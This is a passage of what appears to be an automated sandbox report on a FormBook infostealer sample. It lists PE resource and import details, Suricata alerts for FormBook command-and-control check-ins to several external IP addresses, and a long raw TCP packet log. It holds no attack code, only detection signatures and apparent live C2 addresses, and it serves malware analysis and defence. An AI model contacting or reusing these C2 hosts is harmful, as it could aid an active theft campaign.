RT_GROUP_ICON	0xc7be8	0x14	data	1.05
RT_VERSION	0xc7c0c	0x38c	PGP symmetric key encrypted data - Plaintext or unencrypted data	0.42290748898678415

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-25T13:56:22.160791+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	49947	168.206.11.225	80	TCP
2024-11-25T13:56:29.262803+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50004	162.0.229.222	80	TCP
2024-11-25T13:56:31.928607+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50010	162.0.229.222	80	TCP
2024-11-25T13:56:34.534090+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50018	162.0.229.222	80	TCP
2024-11-25T13:56:37.529606+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	50021	162.0.229.222	80	TCP
2024-11-25T13:56:44.666849+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50022	3.33.130.190	80	TCP
2024-11-25T13:56:47.419669+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50023	3.33.130.190	80	TCP
2024-11-25T13:56:50.043557+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50024	3.33.130.190	80	TCP
2024-11-25T13:56:52.702666+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	50025	3.33.130.190	80	TCP
2024-11-25T13:57:07.890800+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50026	3.33.130.190	80	TCP
2024-11-25T13:57:10.537361+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50027	3.33.130.190	80	TCP
2024-11-25T13:57:13.234526+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50028	3.33.130.190	80	TCP
2024-11-25T13:57:15.953296+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	50029	3.33.130.190	80	TCP
2024-11-25T13:57:23.396085+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50030	217.160.0.158	80	TCP
2024-11-25T13:57:26.019326+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50031	217.160.0.158	80	TCP
2024-11-25T13:57:28.799181+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50032	217.160.0.158	80	TCP
2024-11-25T13:57:31.418578+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	50033	217.160.0.158	80	TCP
2024-11-25T13:57:38.935760+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50034	213.249.67.10	80	TCP
2024-11-25T13:57:41.719099+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50035	213.249.67.10	80	TCP
2024-11-25T13:57:44.490880+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50036	213.249.67.10	80	TCP
2024-11-25T13:57:47.239353+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	50037	213.249.67.10	80	TCP
2024-11-25T13:57:55.031888+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50038	92.118.228.160	80	TCP
2024-11-25T13:57:57.707338+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50039	92.118.228.160	80	TCP
2024-11-25T13:58:00.266676+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50040	92.118.228.160	80	TCP
2024-11-25T13:58:03.037197+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	50041	92.118.228.160	80	TCP
2024-11-25T13:58:09.805444+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50042	3.33.130.190	80	TCP
2024-11-25T13:58:12.467990+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50043	3.33.130.190	80	TCP
2024-11-25T13:58:15.123168+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50044	3.33.130.190	80	TCP
2024-11-25T13:58:17.837518+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	50045	3.33.130.190	80	TCP
2024-11-25T13:58:24.840722+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50047	209.74.64.190	80	TCP
2024-11-25T13:58:28.248991+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50048	209.74.64.190	80	TCP
2024-11-25T13:58:31.018039+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50049	209.74.64.190	80	TCP
2024-11-25T13:58:33.808582+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	50050	209.74.64.190	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2024 13:56:00.145055056 CET	49947	80	192.168.2.6	168.206.11.225
Nov 25, 2024 13:56:00.265029907 CET	80	49947	168.206.11.225	192.168.2.6
Nov 25, 2024 13:56:00.265132904 CET	49947	80	192.168.2.6	168.206.11.225
Nov 25, 2024 13:56:00.273483992 CET	49947	80	192.168.2.6	168.206.11.225
Nov 25, 2024 13:56:00.393769026 CET	80	49947	168.206.11.225	192.168.2.6
Nov 25, 2024 13:56:22.159449100 CET	80	49947	168.206.11.225	192.168.2.6
Nov 25, 2024 13:56:22.160790920 CET	49947	80	192.168.2.6	168.206.11.225
Nov 25, 2024 13:56:22.162488937 CET	49947	80	192.168.2.6	168.206.11.225
Nov 25, 2024 13:56:22.282375097 CET	80	49947	168.206.11.225	192.168.2.6
Nov 25, 2024 13:56:27.795634985 CET	50004	80	192.168.2.6	162.0.229.222
Nov 25, 2024 13:56:27.919487953 CET	80	50004	162.0.229.222	192.168.2.6
Nov 25, 2024 13:56:27.919586897 CET	50004	80	192.168.2.6	162.0.229.222
Nov 25, 2024 13:56:27.932960987 CET	50004	80	192.168.2.6	162.0.229.222
Nov 25, 2024 13:56:28.054075956 CET	80	50004	162.0.229.222	192.168.2.6
Nov 25, 2024 13:56:29.262661934 CET	80	50004	162.0.229.222	192.168.2.6
Nov 25, 2024 13:56:29.262732029 CET	80	50004	162.0.229.222	192.168.2.6
Nov 25, 2024 13:56:29.262746096 CET	80	50004	162.0.229.222	192.168.2.6
Nov 25, 2024 13:56:29.262803078 CET	50004	80	192.168.2.6	162.0.229.222
Nov 25, 2024 13:56:29.262854099 CET	80	50004	162.0.229.222	192.168.2.6
Nov 25, 2024 13:56:29.262867928 CET	80	50004	162.0.229.222	192.168.2.6
Nov 25, 2024 13:56:29.262907982 CET	80	50004	162.0.229.222	192.168.2.6
Nov 25, 2024 13:56:29.262909889 CET	50004	80	192.168.2.6	162.0.229.222
Nov 25, 2024 13:56:29.263251066 CET	50004	80	192.168.2.6	162.0.229.222
Nov 25, 2024 13:56:29.449389935 CET	50004	80	192.168.2.6	162.0.229.222
Nov 25, 2024 13:56:30.468175888 CET	50010	80	192.168.2.6	162.0.229.222
Nov 25, 2024 13:56:30.588222980 CET	80	50010	162.0.229.222	192.168.2.6
Nov 25, 2024 13:56:30.588370085 CET	50010	80	192.168.2.6	162.0.229.222
Nov 25, 2024 13:56:30.599486113 CET	50010	80	192.168.2.6	162.0.229.222
Nov 25, 2024 13:56:30.719980955 CET	80	50010	162.0.229.222	192.168.2.6
Nov 25, 2024 13:56:31.928468943 CET	80	50010	162.0.229.222	192.168.2.6
Nov 25, 2024 13:56:31.928508997 CET	80	50010	162.0.229.222	192.168.2.6
Nov 25, 2024 13:56:31.928524971 CET	80	50010	162.0.229.222	192.168.2.6
Nov 25, 2024 13:56:31.928606987 CET	50010	80	192.168.2.6	162.0.229.222
Nov 25, 2024 13:56:31.928639889 CET	80	50010	162.0.229.222	192.168.2.6
Nov 25, 2024 13:56:31.928658009 CET	80	50010	162.0.229.222	192.168.2.6
Nov 25, 2024 13:56:31.928675890 CET	80	50010	162.0.229.222	192.168.2.6
Nov 25, 2024 13:56:31.928689957 CET	50010	80	192.168.2.6	162.0.229.222
Nov 25, 2024 13:56:31.928740025 CET	50010	80	192.168.2.6	162.0.229.222
Nov 25, 2024 13:56:32.105956078 CET	50010	80	192.168.2.6	162.0.229.222
Nov 25, 2024 13:56:33.135103941 CET	50018	80	192.168.2.6	162.0.229.222
Nov 25, 2024 13:56:33.255345106 CET	80	50018	162.0.229.222	192.168.2.6
Nov 25, 2024 13:56:33.255501986 CET	50018	80	192.168.2.6	162.0.229.222
Nov 25, 2024 13:56:33.268244028 CET	50018	80	192.168.2.6	162.0.229.222
Nov 25, 2024 13:56:33.388204098 CET	80	50018	162.0.229.222	192.168.2.6
Nov 25, 2024 13:56:33.388274908 CET	80	50018	162.0.229.222	192.168.2.6
Nov 25, 2024 13:56:34.533963919 CET	80	50018	162.0.229.222	192.168.2.6
Nov 25, 2024 13:56:34.533997059 CET	80	50018	162.0.229.222	192.168.2.6
Nov 25, 2024 13:56:34.534008980 CET	80	50018	162.0.229.222	192.168.2.6
Nov 25, 2024 13:56:34.534080982 CET	80	50018	162.0.229.222	192.168.2.6
Nov 25, 2024 13:56:34.534090042 CET	50018	80	192.168.2.6	162.0.229.222
Nov 25, 2024 13:56:34.534094095 CET	80	50018	162.0.229.222	192.168.2.6
Nov 25, 2024 13:56:34.534107924 CET	80	50018	162.0.229.222	192.168.2.6
Nov 25, 2024 13:56:34.534152031 CET	50018	80	192.168.2.6	162.0.229.222
Nov 25, 2024 13:56:34.777853966 CET	50018	80	192.168.2.6	162.0.229.222
Nov 25, 2024 13:56:35.796597004 CET	50021	80	192.168.2.6	162.0.229.222
Nov 25, 2024 13:56:35.916637897 CET	80	50021	162.0.229.222	192.168.2.6
Nov 25, 2024 13:56:35.916738033 CET	50021	80	192.168.2.6	162.0.229.222
Nov 25, 2024 13:56:35.924463987 CET	50021	80	192.168.2.6	162.0.229.222
Nov 25, 2024 13:56:36.045089006 CET	80	50021	162.0.229.222	192.168.2.6
Nov 25, 2024 13:56:37.529421091 CET	80	50021	162.0.229.222	192.168.2.6
Nov 25, 2024 13:56:37.529447079 CET	80	50021	162.0.229.222	192.168.2.6
Nov 25, 2024 13:56:37.529458046 CET	80	50021	162.0.229.222	192.168.2.6
Nov 25, 2024 13:56:37.529464006 CET	80	50021	162.0.229.222	192.168.2.6
Nov 25, 2024 13:56:37.529469967 CET	80	50021	162.0.229.222	192.168.2.6
Nov 25, 2024 13:56:37.529483080 CET	80	50021	162.0.229.222	192.168.2.6
Nov 25, 2024 13:56:37.529494047 CET	80	50021	162.0.229.222	192.168.2.6
Nov 25, 2024 13:56:37.529505014 CET	80	50021	162.0.229.222	192.168.2.6
Nov 25, 2024 13:56:37.529521942 CET	80	50021	162.0.229.222	192.168.2.6
Nov 25, 2024 13:56:37.529532909 CET	80	50021	162.0.229.222	192.168.2.6
Nov 25, 2024 13:56:37.529546022 CET	80	50021	162.0.229.222	192.168.2.6
Nov 25, 2024 13:56:37.529606104 CET	50021	80	192.168.2.6	162.0.229.222
Nov 25, 2024 13:56:37.529648066 CET	50021	80	192.168.2.6	162.0.229.222
Nov 25, 2024 13:56:37.533500910 CET	80	50021	162.0.229.222	192.168.2.6
Nov 25, 2024 13:56:37.533541918 CET	50021	80	192.168.2.6	162.0.229.222
Nov 25, 2024 13:56:37.534848928 CET	50021	80	192.168.2.6	162.0.229.222
Nov 25, 2024 13:56:37.654757977 CET	80	50021	162.0.229.222	192.168.2.6
Nov 25, 2024 13:56:43.443175077 CET	50022	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:56:43.563601017 CET	80	50022	3.33.130.190	192.168.2.6
Nov 25, 2024 13:56:43.563695908 CET	50022	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:56:43.575553894 CET	50022	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:56:43.695684910 CET	80	50022	3.33.130.190	192.168.2.6
Nov 25, 2024 13:56:44.666762114 CET	80	50022	3.33.130.190	192.168.2.6
Nov 25, 2024 13:56:44.666848898 CET	50022	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:56:45.090024948 CET	50022	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:56:45.210225105 CET	80	50022	3.33.130.190	192.168.2.6
Nov 25, 2024 13:56:46.110003948 CET	50023	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:56:46.230396986 CET	80	50023	3.33.130.190	192.168.2.6
Nov 25, 2024 13:56:46.230494022 CET	50023	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:56:46.247091055 CET	50023	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:56:46.367549896 CET	80	50023	3.33.130.190	192.168.2.6
Nov 25, 2024 13:56:47.419558048 CET	80	50023	3.33.130.190	192.168.2.6
Nov 25, 2024 13:56:47.419668913 CET	50023	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:56:47.761935949 CET	50023	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:56:47.881931067 CET	80	50023	3.33.130.190	192.168.2.6
Nov 25, 2024 13:56:48.780971050 CET	50024	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:56:48.901391029 CET	80	50024	3.33.130.190	192.168.2.6
Nov 25, 2024 13:56:48.901499033 CET	50024	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:56:48.914824009 CET	50024	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:56:49.034823895 CET	80	50024	3.33.130.190	192.168.2.6
Nov 25, 2024 13:56:49.034986019 CET	80	50024	3.33.130.190	192.168.2.6
Nov 25, 2024 13:56:50.043483019 CET	80	50024	3.33.130.190	192.168.2.6
Nov 25, 2024 13:56:50.043556929 CET	50024	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:56:50.418144941 CET	50024	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:56:50.538239956 CET	80	50024	3.33.130.190	192.168.2.6
Nov 25, 2024 13:56:51.436863899 CET	50025	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:56:51.557276011 CET	80	50025	3.33.130.190	192.168.2.6
Nov 25, 2024 13:56:51.557418108 CET	50025	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:56:51.564704895 CET	50025	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:56:51.685205936 CET	80	50025	3.33.130.190	192.168.2.6
Nov 25, 2024 13:56:52.702435970 CET	80	50025	3.33.130.190	192.168.2.6
Nov 25, 2024 13:56:52.702554941 CET	80	50025	3.33.130.190	192.168.2.6
Nov 25, 2024 13:56:52.702666044 CET	50025	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:56:52.705286026 CET	50025	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:56:52.825208902 CET	80	50025	3.33.130.190	192.168.2.6
Nov 25, 2024 13:57:06.625370026 CET	50026	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:57:06.745424032 CET	80	50026	3.33.130.190	192.168.2.6
Nov 25, 2024 13:57:06.745919943 CET	50026	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:57:06.765336990 CET	50026	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:57:06.885430098 CET	80	50026	3.33.130.190	192.168.2.6
Nov 25, 2024 13:57:07.890616894 CET	80	50026	3.33.130.190	192.168.2.6
Nov 25, 2024 13:57:07.890799999 CET	50026	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:57:08.277978897 CET	50026	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:57:08.445494890 CET	80	50026	3.33.130.190	192.168.2.6
Nov 25, 2024 13:57:09.310961962 CET	50027	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:57:09.430975914 CET	80	50027	3.33.130.190	192.168.2.6
Nov 25, 2024 13:57:09.431077003 CET	50027	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:57:09.444659948 CET	50027	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:57:09.565871954 CET	80	50027	3.33.130.190	192.168.2.6
Nov 25, 2024 13:57:10.537267923 CET	80	50027	3.33.130.190	192.168.2.6
Nov 25, 2024 13:57:10.537360907 CET	50027	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:57:10.949385881 CET	50027	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:57:11.069586992 CET	80	50027	3.33.130.190	192.168.2.6
Nov 25, 2024 13:57:11.969403982 CET	50028	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:57:12.089647055 CET	80	50028	3.33.130.190	192.168.2.6
Nov 25, 2024 13:57:12.089775085 CET	50028	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:57:12.109241962 CET	50028	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:57:12.229384899 CET	80	50028	3.33.130.190	192.168.2.6
Nov 25, 2024 13:57:12.229402065 CET	80	50028	3.33.130.190	192.168.2.6
Nov 25, 2024 13:57:13.232769966 CET	80	50028	3.33.130.190	192.168.2.6
Nov 25, 2024 13:57:13.234525919 CET	50028	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:57:13.621277094 CET	50028	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:57:13.744800091 CET	80	50028	3.33.130.190	192.168.2.6
Nov 25, 2024 13:57:14.641405106 CET	50029	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:57:14.761476994 CET	80	50029	3.33.130.190	192.168.2.6
Nov 25, 2024 13:57:14.761620045 CET	50029	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:57:14.770536900 CET	50029	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:57:14.890995026 CET	80	50029	3.33.130.190	192.168.2.6
Nov 25, 2024 13:57:15.953053951 CET	80	50029	3.33.130.190	192.168.2.6
Nov 25, 2024 13:57:15.953097105 CET	80	50029	3.33.130.190	192.168.2.6
Nov 25, 2024 13:57:15.953295946 CET	50029	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:57:16.006899118 CET	50029	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:57:16.127712011 CET	80	50029	3.33.130.190	192.168.2.6
Nov 25, 2024 13:57:21.938494921 CET	50030	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:22.061223984 CET	80	50030	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:22.061369896 CET	50030	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:22.086493969 CET	50030	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:22.206558943 CET	80	50030	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:23.395997047 CET	80	50030	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:23.396025896 CET	80	50030	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:23.396039009 CET	80	50030	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:23.396085024 CET	50030	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:23.396099091 CET	80	50030	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:23.396114111 CET	80	50030	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:23.396126032 CET	80	50030	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:23.396138906 CET	80	50030	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:23.396156073 CET	50030	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:23.396168947 CET	50030	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:23.396212101 CET	80	50030	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:23.396224022 CET	80	50030	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:23.396234989 CET	80	50030	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:23.396260977 CET	50030	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:23.396331072 CET	50030	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:23.516298056 CET	80	50030	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:23.516386986 CET	80	50030	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:23.516465902 CET	50030	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:23.590385914 CET	50030	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:23.604897022 CET	80	50030	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:23.604938984 CET	80	50030	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:23.605020046 CET	50030	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:23.605020046 CET	50030	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:23.609071016 CET	80	50030	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:23.610025883 CET	80	50030	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:23.610074043 CET	50030	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:23.610074043 CET	50030	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:24.610538960 CET	50031	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:24.730577946 CET	80	50031	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:24.731875896 CET	50031	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:24.768070936 CET	50031	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:24.888864040 CET	80	50031	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:26.019138098 CET	80	50031	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:26.019223928 CET	80	50031	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:26.019258976 CET	80	50031	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:26.019293070 CET	80	50031	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:26.019325972 CET	50031	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:26.019364119 CET	80	50031	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:26.019366026 CET	50031	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:26.019399881 CET	80	50031	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:26.019434929 CET	80	50031	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:26.019469023 CET	80	50031	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:26.019501925 CET	80	50031	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:26.019536018 CET	80	50031	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:26.019553900 CET	50031	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:26.019670963 CET	50031	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:26.139849901 CET	80	50031	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:26.139889002 CET	80	50031	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:26.139992952 CET	50031	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:26.143867970 CET	80	50031	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:26.211013079 CET	80	50031	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:26.211107969 CET	80	50031	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:26.211157084 CET	50031	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:26.215106964 CET	80	50031	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:26.215233088 CET	50031	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:26.216043949 CET	80	50031	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:26.216187954 CET	50031	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:26.282623053 CET	50031	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:27.296751976 CET	50032	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:27.417503119 CET	80	50032	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:27.417625904 CET	50032	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:27.431988001 CET	50032	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:27.552423000 CET	80	50032	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:27.552581072 CET	80	50032	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:28.799093962 CET	80	50032	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:28.799123049 CET	80	50032	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:28.799140930 CET	80	50032	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:28.799153090 CET	80	50032	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:28.799164057 CET	80	50032	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:28.799175978 CET	80	50032	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:28.799180984 CET	50032	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:28.799216986 CET	50032	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:28.799216986 CET	50032	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:28.799384117 CET	80	50032	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:28.799431086 CET	80	50032	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:28.799443007 CET	80	50032	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:28.799458981 CET	80	50032	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:28.799483061 CET	50032	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:28.799508095 CET	50032	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:28.921132088 CET	80	50032	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:28.921166897 CET	80	50032	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:28.921282053 CET	50032	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:28.933801889 CET	50032	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:29.009434938 CET	80	50032	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:29.009463072 CET	80	50032	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:29.009490967 CET	50032	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:29.009533882 CET	50032	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:29.013547897 CET	80	50032	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:29.013631105 CET	50032	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:29.014352083 CET	80	50032	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:29.014390945 CET	50032	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:29.952972889 CET	50033	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:30.073846102 CET	80	50033	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:30.074140072 CET	50033	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:30.083641052 CET	50033	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:30.203902960 CET	80	50033	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:31.418322086 CET	80	50033	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:31.418467999 CET	80	50033	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:31.418481112 CET	80	50033	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:31.418493032 CET	80	50033	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:31.418503046 CET	80	50033	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:31.418514013 CET	80	50033	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:31.418525934 CET	80	50033	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:31.418577909 CET	50033	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:31.418627024 CET	50033	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:31.418637037 CET	80	50033	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:31.418648005 CET	80	50033	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:31.418659925 CET	80	50033	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:31.418673992 CET	50033	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:31.418706894 CET	50033	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:31.539411068 CET	80	50033	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:31.539700031 CET	80	50033	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:31.539808989 CET	50033	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:31.543617964 CET	80	50033	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:31.619242907 CET	80	50033	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:31.619349957 CET	50033	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:31.619451046 CET	80	50033	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:31.623456001 CET	80	50033	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:31.623526096 CET	50033	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:31.623543978 CET	80	50033	217.160.0.158	192.168.2.6
